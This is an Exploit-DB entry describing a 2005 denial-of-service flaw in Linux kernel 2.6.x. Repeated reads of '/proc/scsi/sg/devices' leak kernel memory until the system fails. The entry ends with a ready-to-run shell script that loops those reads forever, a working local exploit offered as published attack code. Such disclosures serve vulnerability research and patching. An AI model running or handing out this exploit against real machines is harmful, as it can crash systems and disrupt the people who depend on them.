Lucene search

K
exploitdbAnonymousEDB-ID:26248
HistorySep 09, 2005 - 12:00 a.m.

Linux Kernel 2.6.x - SCSI ProcFS Denial of Service

2005-09-0900:00:00
anonymous
www.exploit-db.com
16

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/14790/info

The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service.

A local attacker can exploit this vulnerability by making repeated reads to the '/proc/scsi/sg/devices' file, which will exhaust kernel memory and lead to a denial of service. 

#!/bin/sh

while true; do
cat /proc/scsi/sg/devices > /dev/null
done